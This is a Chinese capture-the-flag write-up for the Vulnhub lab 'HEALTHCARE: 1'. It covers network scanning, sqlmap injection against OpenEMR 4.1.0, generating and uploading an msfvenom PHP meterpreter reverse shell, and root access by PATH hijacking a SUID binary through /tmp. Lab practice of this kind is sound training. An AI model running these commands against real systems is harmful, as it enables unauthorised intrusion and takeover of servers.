• Vulnhub实战靶场:HEALTHCARE: 1


    一、环境搭建

    1、官网下载连接:https://www.vulnhub.com/entry/healthcare-1,522/

    2、下载之后,使用Oracle VM VirtualBox导入靶场环境

    3、为了正常练习,将靶场的网卡模式设置为桥接模式,启动即可

     

    二、靶场攻略

    1、nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.1.0/24,找到靶场真实ip地址

     2、nmap -A -p- 192.168.1.168,查看服务,开启了21端口和80端口

     3、访问80端口,寻找突破口

     robots.txt文件中的目录都无法访问,不是403就是404

     使用dirbuster的目录字典进行爆破,爆破出一个/openemr目录,也可以访问

     

     4、/openemr为后台目录,并且得到后台为openemr 4.1.0,搜索得知该版本存在SQL注入漏洞

    使用命令:sqlmap -u "http://192.168.1.168/openemr/interface/login/validateUser.php?u=1" 测试,确实存在注入点

    通过注入漏洞,得到后台的数据库账号密码,成功登录后台

     5、在Messages中随便建立一个用户之后,找到一个上传点,在Documents选项中

    使用msf生成php反弹shell的后门脚本,输入命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.122 LPORT=1234 > shell.php

     启动msf,设置好监听payload之后,直接上传生成的php脚本,成功上传并返回文件绝对路径,访问之后成功收到shell

     

     

     6、下一步就是提权了,输入命令:find / -perm -u=s -type f 2>/dev/null

     使用strings /usr/bin/healthcheck,查看文件,发现带有命令

     7、参考链接:https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/,进行提权

    首先执行命令:/usr/bin/healthcheck | more

    发现程序会调用/tmp目录,使用命令:

    cd /tmp

    echo "bin/bash" > ifconfig

    chmod 777 ifconfig

    export PATH=/tmp:$PATH

    /usr/bin/healthcheck,成功提权

     

    得到flag

     

     完

  • 相关阅读:
    Core上传图片
    Pytho学习(3)——注释
    zabbix实操随笔
    1900型USB接口扫描枪设置虚拟串口模式提升扫描速度
    SQLServer设置单用户
    入门安装环境
    centos下载
    java学习资料
    错误模块名称: KERNELBASE.dll
    iis部署WebService出现"因 URL 意外地以 结束,请求格式无法识别"的解决方法
  • 原文地址:https://www.cnblogs.com/sym945/p/14140621.html
Copyright © 2020-2023  润新知